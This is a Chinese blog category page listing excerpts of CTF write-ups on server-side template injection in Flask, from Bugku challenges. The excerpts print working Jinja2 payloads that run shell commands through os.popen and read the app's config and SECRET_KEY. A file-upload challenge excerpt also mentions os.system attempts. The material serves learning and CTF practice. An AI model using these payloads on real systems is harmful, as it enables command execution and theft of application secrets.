![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
SSTI
文章平均质量分 70
zbbjya
这个作者很懒,什么都没留下…
展开
-
SSTI知识点与题型
首先会出现这样的界面?name={{1%2b1}}hello%2b= + %2b是url编码?name={{1+1}}hello执行成功说明是有模板注入?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}从查询的语句中看到了flag然后直接cat flag就可以得到了?name={{ config.__class__.__init__.__globals__['os'原创 2022-04-15 01:09:03 · 472 阅读 · 0 评论 -
## Flask_FileUpload bugku
Flask_FileUpload查看网页源代码,然后看到文件上传的类型是只能这两种形式 jpg png要是python可运行同时也要jpg在写好之后将文件后缀名更改上传上传成功但是没有flag我试了好几次从import osos.system(‘ls/’);不知道为什么我还是错了我很心痛,做不出来,明天再战吧我感觉我的眼睛有点花...原创 2022-03-17 16:47:06 · 1521 阅读 · 0 评论 -
# BUGKU Simple_SSTI_1-2
##BUGKU Simple_SSTI_1查看网页源代码提示需要传一个flag参数,Flask 是一个微型的 Python 开发的 Web 框架,由上可知flag在secret_key下,config是flask模板中的一个全局对象而使用/?flag={{config.items()}} 读取配置文件可得到,其数据,flag也在里面/?flag={{config.SECRET_KEY}} 可直接得到flagSimple_SSTI_2同样提示需要传一个flag参数查看网原创 2022-03-17 15:27:18 · 746 阅读 · 0 评论